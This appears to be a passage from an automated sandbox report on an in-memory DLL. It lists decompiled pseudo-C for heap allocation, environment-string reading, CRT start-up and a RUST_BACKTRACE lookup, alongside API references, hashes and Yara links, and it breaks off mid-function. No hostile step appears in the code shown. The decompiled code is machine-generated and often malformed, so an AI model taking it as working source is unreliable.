                          Similarity
                          • API ID: Count64Tick$Heap$AllocFreeProcess
                          • String ID: '`Ly
                          • API String ID: 2047189075-560155178
                          • Opcode ID: 47bd0a29ca4355796e9b3970fcd1aff986b238c643306d7e1e9563b57cb3eeb5
                          • Instruction ID: 21eb445beaa81419ac611e92b8820783168da9285c309fc0aefca7a345e567c8
                          • Opcode Fuzzy Hash: 47bd0a29ca4355796e9b3970fcd1aff986b238c643306d7e1e9563b57cb3eeb5
                          • Instruction Fuzzy Hash: 4851A9B1A04B448BD3248F24D980B56BBF4FF49318F108A2DD8968BB85E734F554CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F251AA1, Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                          Download Yara Rule
                          C-Code - Quality: 19%
                          			E6F251AA1() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E6F251A6A(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E6F2519B3(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E6F24FC29(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E6F2519B3() != 0) {
								E6F2505C3(0);
								_t19 = _t26;
							} else {
								E6F2505C3(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E6F2505C3();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}












                          0x6f251aa7
                          0x6f251aa9
                          0x6f251aaf
                          0x6f251ab3
                          0x6f251abb
                          0x6f251ac0
                          0x6f251ace
                          0x6f251ad1
                          0x6f251ad9
                          0x6f251ade
                          0x6f251aed
                          0x6f251af2
                          0x6f251af5
                          0x6f251af8
                          0x6f251b0b
                          0x6f251b0c
                          0x6f251b0f
                          0x6f251b10
                          0x6f251b13
                          0x6f251b14
                          0x6f251b15
                          0x6f251b20
                          0x6f251b2b
                          0x6f251b30
                          0x6f251b22
                          0x6f251b23
                          0x6f251b23
                          0x6f251b34
                          0x6f251b3a
                          0x6f251afa
                          0x6f251afa
                          0x6f251b01
                          0x6f251b07
                          0x6f251b07
                          0x6f251ae0
                          0x6f251ae1
                          0x6f251ae7
                          0x6f251ae7
                          0x6f251b3d
                          0x6f251b40

                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 6F251AA9
                            • Part of subcall function 6F2519B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6F253B22,?,00000000,-00000008), ref: 6F251A5F
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F251AE1
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F251B01
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                          • String ID:
                          • API String ID: 158306478-0
                          • Opcode ID: 2d295a7a55a6d70dd0d9ac60c7049ce73f67666be7503cf00d8a85c32f97a273
                          • Instruction ID: cac183af48e7b4e051709a98ac8359ca6c4266f6fd05b8422a517a146e6b1439
                          • Opcode Fuzzy Hash: 2d295a7a55a6d70dd0d9ac60c7049ce73f67666be7503cf00d8a85c32f97a273
                          • Instruction Fuzzy Hash: 9C1144B191960E7E6B015BB18C9DCAF296CEF862A83000122F40081140FBA0DEB0CEB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24A114, Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E6F24A114(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags, void* __fp0) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;
				void* _t140;

				_t140 = __fp0;
				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6F24AC90(__ebx, __edi, __esi);
				_t43 = E6F24A96D(__ecx, __edx, 0);
				_t90 = 0x6f287d60;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6F24A872();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6f28b158;
					if( *0x6f28b158 != 0) {
						E6F24AB0C(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6f287d80);
						E6F24AC90(1, __edi, __esi);
						_t48 =  *0x6f28ae14; // 0x0
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6f28ae14 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6F24A872();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6f28b158 - 2;
							if( *0x6f28b158 != 2) {
								E6F24AB0C(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6f287da8);
								E6F24AC90(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6F24A3D6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6F24A0C1(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(_t115 != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(_t110 == 2) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_t56 = E6F231290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(_t115 == 0) {
													_t59 = E6F231290(_t86, _t110, _t115, _t140,  *((intOrPtr*)(_t123 + 8)), _t56, _t86);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6F24A3D6( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6F24A0C1(_t90,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6F24A3D6( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6f28ae14 - _t110; // 0x0
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6F24A93D(1, _t90, 1, _t113);
								E6F24A7F9();
								E6F24AC5B();
								 *0x6f28b158 =  *0x6f28b158 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6F24A2B0();
								_t67 = E6F24AADE(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6F24A2BD();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6f28b158 = 1;
						if(E6F24A8CF(_t132) != 0) {
							E6F24A7ED(E6F24AC2F());
							E6F24A811();
							_t80 = E6F24E791(0x6f25817c, 0x6f25818c); // executed
							_pop(_t102);
							if(_t80 == 0 && E6F24A8A4(1, _t102) != 0) {
								E6F24E766(0x6f258158, 0x6f258178); // executed
								 *0x6f28b158 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6F24A1F7();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6F24AB06();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6F24AA2D(_t85, _t106, _t121, _t138) != 0) {
									 *0x6f258154( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6f28ae14 =  *0x6f28ae14 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}






















                          0x6f24a114
                          0x6f24a114
                          0x6f24a114
                          0x6f24a114
                          0x6f24a114
                          0x6f24a11b
                          0x6f24a122
                          0x6f24a127
                          0x6f24a12a
                          0x6f24a201
                          0x6f24a201
                          0x6f24a201
                          0x00000000
                          0x6f24a130
                          0x6f24a135
                          0x6f24a138
                          0x6f24a13a
                          0x6f24a13d
                          0x6f24a141
                          0x6f24a148
                          0x6f24a215
                          0x6f24a21a
                          0x6f24a21b
                          0x6f24a21d
                          0x6f24a222
                          0x6f24a227
                          0x6f24a22c
                          0x6f24a22e
                          0x6f24a235
                          0x6f24a23d
                          0x6f24a240
                          0x6f24a249
                          0x6f24a24c
                          0x6f24a24f
                          0x6f24a256
                          0x6f24a2c5
                          0x6f24a2ca
                          0x6f24a2cb
                          0x6f24a2cd
                          0x6f24a2d2
                          0x6f24a2d7
                          0x6f24a2da
                          0x6f24a2dc
                          0x6f24a2ed
                          0x6f24a2ed
                          0x6f24a2f1
                          0x6f24a2f4
                          0x6f24a300
                          0x6f24a300
                          0x6f24a30d
                          0x6f24a30f
                          0x6f24a312
                          0x6f24a314
                          0x6f24a31f
                          0x6f24a324
                          0x6f24a326
                          0x6f24a329
                          0x6f24a32b
                          0x00000000
                          0x00000000
                          0x6f24a32b
                          0x6f24a2f6
                          0x6f24a2f6
                          0x6f24a2f9
                          0x00000000
                          0x6f24a2fb
                          0x6f24a2fb
                          0x6f24a331
                          0x6f24a336
                          0x6f24a33b
                          0x6f24a33d
                          0x6f24a340
                          0x6f24a343
                          0x6f24a345
                          0x6f24a347
                          0x6f24a34e
                          0x6f24a353
                          0x6f24a355
                          0x6f24a355
                          0x6f24a35b
                          0x6f24a35c
                          0x6f24a361
                          0x6f24a367
                          0x6f24a367
                          0x6f24a347
                          0x6f24a36c
                          0x6f24a36e
                          0x6f24a375
                          0x6f24a37f
                          0x6f24a381
                          0x6f24a384
                          0x6f24a386
                          0x6f24a392
                          0x6f24a3ba
                          0x6f24a3ba
                          0x6f24a370
                          0x6f24a370
                          0x6f24a373
                          0x00000000
                          0x00000000
                          0x6f24a373
                          0x6f24a36e
                          0x6f24a2f9
                          0x6f24a3bd
                          0x6f24a3c4
                          0x6f24a2de
                          0x6f24a2de
                          0x6f24a2e4
                          0x00000000
                          0x6f24a2e6
                          0x6f24a2e6
                          0x6f24a2e6
                          0x6f24a2e4
                          0x6f24a3c9
                          0x6f24a3d5
                          0x6f24a258
                          0x6f24a258
                          0x6f24a25d
                          0x6f24a262
                          0x6f24a267
                          0x6f24a26e
                          0x6f24a272
                          0x6f24a27c
                          0x6f24a288
                          0x6f24a28a
                          0x6f24a28a
                          0x6f24a28c
                          0x6f24a28f
                          0x6f24a296
                          0x6f24a29b
                          0x00000000
                          0x6f24a29b
                          0x6f24a230
                          0x6f24a230
                          0x6f24a29d
                          0x6f24a2a0
                          0x6f24a2ac
                          0x6f24a2ac
                          0x6f24a14e
                          0x6f24a14e
                          0x6f24a15f
                          0x6f24a166
                          0x6f24a16b
                          0x6f24a17a
                          0x6f24a180
                          0x6f24a183
                          0x6f24a198
                          0x6f24a19f
                          0x6f24a1a9
                          0x6f24a1ab
                          0x6f24a1ab
                          0x6f24a183
                          0x6f24a1ae
                          0x6f24a1b5
                          0x6f24a1bc
                          0x00000000
                          0x6f24a1be
                          0x6f24a1c3
                          0x6f24a1c5
                          0x6f24a1c8
                          0x6f24a1ca
                          0x6f24a1d3
                          0x6f24a1e1
                          0x6f24a1e7
                          0x6f24a1e7
                          0x6f24a1d3
                          0x6f24a1e9
                          0x6f24a1f1
                          0x6f24a1f1
                          0x6f24a203
                          0x6f24a206
                          0x6f24a212
                          0x6f24a212
                          0x6f24a148

                          APIs
                          • __RTC_Initialize.LIBCMT ref: 6F24A161
                            • Part of subcall function 6F24A7ED: InitializeSListHead.KERNEL32(6F28B140,6F24A16B,6F287D60,00000010,6F24A0FC,?,?,?,6F24A324,?,00000001,?,?,00000001,?,6F287DA8), ref: 6F24A7F2
                          • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F24A1CB
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                          • String ID:
                          • API String ID: 3231365870-0
                          • Opcode ID: 497b986fb7d9434b7dc61d36a2c87367c165c58edff1d15206ee017294f203d0
                          • Instruction ID: b29d443f5ca6f869417950ae5524ac10ee133e28b2345f150b4ba51baa2ca838
                          • Opcode Fuzzy Hash: 497b986fb7d9434b7dc61d36a2c87367c165c58edff1d15206ee017294f203d0
                          • Instruction Fuzzy Hash: CE21023254974D9AEF0DAFB4C4057DD37A19F0232DF104439C4A56BAC2DBF21055DEA6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F250566, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F250566(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6f28b5d8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6F252E1C();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6F24F90F())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6F24E7CE(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                          0x6f25056c
                          0x6f250571
                          0x6f25057f
                          0x6f25057f
                          0x6f250585
                          0x6f250587
                          0x6f250587
                          0x6f25059e
                          0x6f2505a7
                          0x6f2505af
                          0x00000000
                          0x00000000
                          0x6f25058f
                          0x6f250591
                          0x6f2505b3
                          0x6f2505b8
                          0x6f2505be
                          0x00000000
                          0x6f2505be
                          0x6f250594
                          0x6f25059a
                          0x6f25059c
                          0x00000000
                          0x00000000
                          0x6f25059c
                          0x00000000
                          0x6f25059e
                          0x6f250577
                          0x6f25057d
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000008,?,?,?,6F25017F,00000001,00000364,?,FFFFFFFF,000000FF,?,?,6F24A44C,?,?,6F2499B4), ref: 6F2505A7
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: ccbc769ce3c0cd56a5141feb1046a2dd2141d8c713b3dc105affc158d0b94109
                          • Instruction ID: 709dc2c674503ee0f2ed9c1fb6acd1694afbd72eb3925e39b237d96601b26f0b
                          • Opcode Fuzzy Hash: ccbc769ce3c0cd56a5141feb1046a2dd2141d8c713b3dc105affc158d0b94109
                          • Instruction Fuzzy Hash: 02F0B43250472FA7AB25DB36CD04A9B3748BF42779B006122EC14E75C0CF60F9308EA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F24FC29, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6F24FC29(long _a4) {
				void* _t4;
				void* _t6;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E6F24F90F())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x6f28b5d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E6F252E1C();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E6F24E7CE(__eflags, _t8);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}






                          0x6f24fc2f
                          0x6f24fc35
                          0x6f24fc67
                          0x6f24fc6c
                          0x6f24fc72
                          0x00000000
                          0x6f24fc72
                          0x6f24fc39
                          0x6f24fc3b
                          0x6f24fc3b
                          0x6f24fc52
                          0x6f24fc5b
                          0x6f24fc63
                          0x00000000
                          0x00000000
                          0x6f24fc43
                          0x6f24fc45
                          0x00000000
                          0x00000000
                          0x6f24fc48
                          0x6f24fc4e
                          0x6f24fc50
                          0x00000000
                          0x00000000
                          0x6f24fc50
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,6F24A44C,?,?,6F2499B4,00000400,FFFDD001,?,?,?), ref: 6F24FC5B
                          Memory Dump Source
                          • Source File: 00000004.00000002.641042475.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000004.00000002.641004987.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641140882.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641221834.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641232429.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000004.00000002.641246076.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: c03d503d2de919f5e2ea6256bd1b204f33c4d46264289348fa5586ececc2e310
                          • Instruction ID: e45cdd332803a72f01df6b84ea5d66ecec145b6188e688692021a12512556ca8
                          • Opcode Fuzzy Hash: c03d503d2de919f5e2ea6256bd1b204f33c4d46264289348fa5586ececc2e310
                          • Instruction Fuzzy Hash: 02E0653118A62E97FB19D765ED04B97768CDFC27B5F010221ECA4979C1CFD0E4108DA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6F23D530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6F23D530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6F243B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6f28adc8;
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6F257370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6f27d2be;
							if(_t264 != 0x6f27d2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6f27d2be;
									if(_t229 == 0x6f27d2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6f27d2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6f27d2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6f27d2be;
											if(_t264 == 0x6f27d2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6f27d2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6f27d2be;
												if(_t273 == 0x6f27d2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6f27d2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6F257370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6F24C310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6f27d0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6F257370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6F240EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
